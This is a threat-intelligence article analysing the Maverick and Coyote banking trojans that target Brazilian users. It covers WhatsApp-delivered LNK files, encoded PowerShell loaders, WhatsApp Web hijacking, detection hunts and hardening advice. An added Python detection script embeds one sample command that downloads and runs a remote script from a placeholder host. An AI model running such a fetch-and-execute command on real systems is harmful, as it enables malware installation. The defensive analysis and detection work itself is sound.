Maverick And Coyote: Twin Brazilian Banking Trojans Riding The WhatsApp Threat Wave

By Ash K

Brazilian banking customers are facing a new generation of focused financial malware. Two closely related families, known as Maverick and Coyote, blend social engineering, fileless infection chains, and abuse of legitimate tools to steal credentials from online banking and cryptocurrency users at scale. Both trojans are built in .NET, heavily obfuscated, and tuned specifically for the Brazilian financial ecosystem.

Coyote established itself first as a multi stage Windows banking trojan that abused legitimate installers and overlay techniques. Maverick appeared later as a mass distribution banker that spreads through WhatsApp, reusing several ideas and code patterns from Coyote while introducing a much more aggressive propagation model. Together, they show how Brazilian banking malware operators are industrializing their toolchains and rapidly iterating on proven tactics.

Background: A Focus On Brazilian Financial Users

Both Maverick and Coyote are narrowly focused on Brazil. Their code checks time zone, language, and region settings, and the malware simply aborts execution if the victim does not appear to be in Brazil. Target lists emphasize local banks, payment platforms, and cryptocurrency services, with hundreds of URLs and applications hard coded into configuration data. This regional focus allows the operators to fine tune phishing overlays, URL monitoring logic, and social engineering lures for a single language and banking culture.

Coyote: Multi Stage Banker That Abuses Legitimate Installers

Initial Access And Delivery

Coyote was first documented as a sophisticated multi stage banking trojan delivered through a legitimate Windows application installer framework. Early campaigns used the Squirrel installer to load a chain of components that eventually injected the Coyote payload into memory. Later activity has also used shortcut (LNK) files and PowerShell based loaders to reach the same final banker.

The infection flow typically involves a legitimate looking installation package or shortcut that launches a script. That script retrieves an obfuscated loader from a command and control server, performs environment checks, disables some security controls where possible, and then uses process injection to run the Coyote banker within benign processes. This approach helps the malware evade simple signature detection and static AV scanning.

Capabilities And Target Scope

Once active, Coyote monitors browser windows and selected applications to identify when the user interacts with targeted financial services. It can:

  • Capture credentials through keylogging and form grabbing.
  • Display phishing overlays that mimic Brazilian banking login pages.
  • Take screenshots when sensitive windows are in focus.
  • Collect system information and security product data to send back to its operators.

Reports indicate that Coyote has targeted dozens of Brazilian banks and a growing list of cryptocurrency exchanges, with configuration files tracking sixty to seventy or more financial applications and websites. Over time, this target list has expanded into the low thousands of individual URLs and services as operators refine their monetization strategy.

Recent Evolution: Abuse Of Windows UI Automation

A more recent variant made Coyote particularly noteworthy by abusing the Windows UI Automation (UIA) framework. Instead of relying only on process names or overlays, the malware uses accessibility features to inspect browser user interface elements, such as address bars and page contents, and then extract data from them.

This capability allows Coyote to recognize when users access targeted banks or cryptocurrency services in the browser and harvest credentials even when traditional overlay techniques are less effective. It also demonstrates a trend toward abusing legitimate accessibility frameworks as covert data collection channels.

Maverick: WhatsApp Driven Successor With Strong Coyote DNA

WhatsApp Distribution And LNK Based Infection Chain

Maverick appeared in 2025 as a new Windows banking trojan spreading through WhatsApp. Campaigns rely on ZIP archives, delivered through WhatsApp messages, that contain a malicious LNK shortcut. The lure often instructs users to open the file on a Windows computer, bypassing mobile protections and placing the victim directly in a desktop context where the banker can operate.

When the victim opens the shortcut, it launches obfuscated cmd.exe and PowerShell commands. These commands reach out to attacker controlled infrastructure, download additional scripts, and construct the next stage payload entirely in memory. Researchers have documented complex chains of nested loops, Base64 strings, and encoded PowerShell payloads that assemble the final banker while avoiding cleartext malicious commands in the process history.

The second stage script typically disables Microsoft Defender and weakens User Account Control, then downloads a .NET loader which finally retrieves the Maverick banker itself. Persistence is achieved using batch files in the startup folder and other low profile mechanisms that blend into normal Windows behavior.

Hijacking WhatsApp Web And Banking Sessions

Maverick does more than silently steal credentials. It also abuses WhatsApp Web to propagate further. By using browser automation components such as ChromeDriver and the Chromium Embedded Framework, along with a WhatsApp automation library, the malware can hijack the victim's WhatsApp Web session and send malicious ZIP archives to all of their contacts.

To maximize its reach, Maverick:

  • Terminates existing Chrome sessions and copies the victim's browser profile into a temporary workspace.
  • Reuses cookies and authentication tokens so it can access WhatsApp Web without user interaction.
  • Contacts the command and control server for message templates and propagation settings.
  • Sends personalized messages with time based greetings and the malicious ZIP file to harvested contacts.

In parallel, Maverick monitors browser tabs for URLs associated with targeted Brazilian financial institutions. When it detects a match, it can capture credentials, manipulate sessions, and assist operators in performing fraudulent transactions. The combination of banking theft and worm like propagation makes Maverick a powerful tool in the hands of Brazilian cybercriminal groups.

Links Between Maverick And Coyote

Threat research teams have highlighted strong links between the two families. Similarities include:

  • Both are written in .NET and use heavily obfuscated loaders.
  • Both rely on shortcut files that spawn multi stage PowerShell infection chains.
  • Both implement almost identical routines for monitoring banking URLs and applications.
  • Both target primarily Brazilian users and banks, with overlapping victim profiles.
  • Both use fileless techniques and reflective loading to reduce forensic artifacts on disk.

Despite these overlaps, Maverick is generally treated as a distinct banker that reuses ideas and components from Coyote rather than a simple variant. The shared DNA indicates that the same development ecosystem, and possibly the same group of operators, is behind both toolsets.

Tactics, Techniques And Procedures

From a defender's perspective, Maverick and Coyote combine several TTPs that are increasingly common in financially motivated campaigns:

  • Initial access through messaging apps: Use of WhatsApp to deliver ZIP archives with shortcut files that are less likely to be blocked than executable attachments.
  • Living off the land scripting: Heavy use of cmd.exe and PowerShell with encoded commands instead of direct binaries.
  • Legitimate tool abuse: Squirrel installers, ChromeDriver, UI Automation and other benign frameworks repurposed as part of the infection chain.
  • Fileless stages and reflective loading: Critical payloads constructed directly in memory to avoid leaving obvious artifacts on disk.
  • Region aware targeting: Execution is gated on system locale checks so that the malware runs only on Brazilian systems.
  • Session hijacking and overlays: Use of UI inspection, overlays, and browser control to capture credentials and drive fraudulent transactions.

Detection And Hunting Guidance

Security teams, especially those in Brazilian banks and fintechs, should consider dedicated hunts for indicators aligned to Maverick and Coyote behavior. Useful approaches include:

  • Monitor for WhatsApp related ZIP downloads: Look for ZIP archives arriving from web.whatsapp.com or WhatsApp desktop clients, especially those containing LNK files.
  • Flag LNK to PowerShell chains: Alert when shortcut files launch cmd.exe or powershell.exe with long, encoded command lines and outbound HTTPS traffic shortly afterward.
  • Detect abnormal use of ChromeDriver and browser automation: On endpoints, watch for ChromeDriver or similar automation tools spawned by PowerShell or scripts in unusual paths.
  • Hunt for UI Automation abuse: On Windows workstations, investigate processes that use UI Automation APIs while also maintaining outbound connections to untrusted hosts.
  • Correlate locale checks and early exits: Malware that terminates quickly after locale checks can appear as short lived processes; correlate such events with unusual script execution or suspicious archives.
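Two of the hunts above, the LNK to PowerShell chain and ChromeDriver spawned by scripts, written as rules over constructed Sysmon-style process-creation events. This is an added example, not code from the original article or from either malware family; the event field names, file paths and the sample encoded command are assumptions made for illustration.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (parent image, image,
# command line) used only to exercise the rules below; none are real IoCs.
ENCODED = base64.b64encode("IEX (IWR 'https://stage.invalid/a')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell.exe -w hidden -nop -enc {ENCODED}"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\wa\chromedriver.exe",
     "cmdline": "chromedriver.exe --port=9515"},
    {"parent": r"C:\Program Files\Vendor\qa-runner.exe",
     "image": r"C:\Program Files\Vendor\chromedriver.exe",
     "cmdline": "chromedriver.exe --port=9515"},
]

# -e / -ec / -enc / -EncodedCommand followed by a long Base64 blob.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{40,})")
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def rule_lnk_to_powershell(ev):
    # A double-clicked shortcut shows as explorer.exe spawning its target (often
    # cmd.exe, then powershell.exe); flag an encoded command and decode it (UTF-16LE).
    if basename(ev["parent"]) not in ("explorer.exe", "cmd.exe") or \
            basename(ev["image"]) not in ("cmd.exe", "powershell.exe"):
        return None
    m = ENC_FLAG.search(ev["cmdline"])
    if not m:
        return None
    decoded = base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    return {"rule": "lnk_encoded_powershell", "decoded": decoded}

def rule_chromedriver_abuse(ev):
    # ChromeDriver launched by a script host, or running outside Program Files,
    # fits the WhatsApp Web session hijack described above.
    if basename(ev["image"]) != "chromedriver.exe":
        return None
    outside = not ev["image"].lower().startswith("c:\\program files")
    if basename(ev["parent"]) in SCRIPT_HOSTS or outside:
        return {"rule": "chromedriver_from_script", "path": ev["image"]}
    return None

def hunt(events):
    rules = (rule_lnk_to_powershell, rule_chromedriver_abuse)
    return [hit for ev in events for rule in rules if (hit := rule(ev))]
```

Network correlation (outbound HTTPS shortly after the chain) needs a second event source and is left to the SIEM join; the rules here only cover the process tree.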

Mitigation And Hardening For Financial Institutions

Defending against Maverick and Coyote requires a combination of endpoint controls, network monitoring, and user awareness. Key actions include:

  • Strengthen endpoint controls: Enforce PowerShell Constrained Language Mode where possible, log script block activity, and block execution of LNK files from user profile download locations.
  • Apply least privilege on desktops: Limit local administrator access so that malware cannot trivially disable security features or change system settings.
  • Harden browser and authentication flows: Enforce multi factor authentication, device binding, and transaction signing for high value actions, reducing the impact of stolen credentials.
  • Control messaging and collaboration channels: Implement content scanning, URL filtering, and attachment controls for WhatsApp Web, email, and other channels used by frontline staff who interact with customers.
  • Run targeted awareness campaigns: Educate users and employees about malicious ZIP archives, shortcuts, and unsolicited financial documents arriving via messaging apps.
  • Prepare response playbooks: Create specific incident response procedures for suspected banking malware, including rapid credential reset, validation of recent transactions, and workstation reimaging where necessary.

Conclusion

Maverick and Coyote illustrate how Brazilian banking malware has evolved from single purpose trojans into modular platforms that blend session hijacking, accessibility abuse, social engineering, and worm like propagation through WhatsApp. Their close relationship suggests an active development ecosystem that will continue to iterate on these techniques and expand target lists across Latin America and beyond.

Financial institutions should treat these campaigns as a strategic threat, not a one off wave of opportunistic attacks. By combining strong endpoint telemetry, browser hardening, secure authentication, and focused threat hunting, defenders can significantly reduce the window of opportunity for Maverick, Coyote, and whatever Brazilian banker emerges next.

Ash K
Ashton is a seasoned cybersecurity professional with over 25 years of experience in cybersecurity research, incident response, and product and security solutions architecture.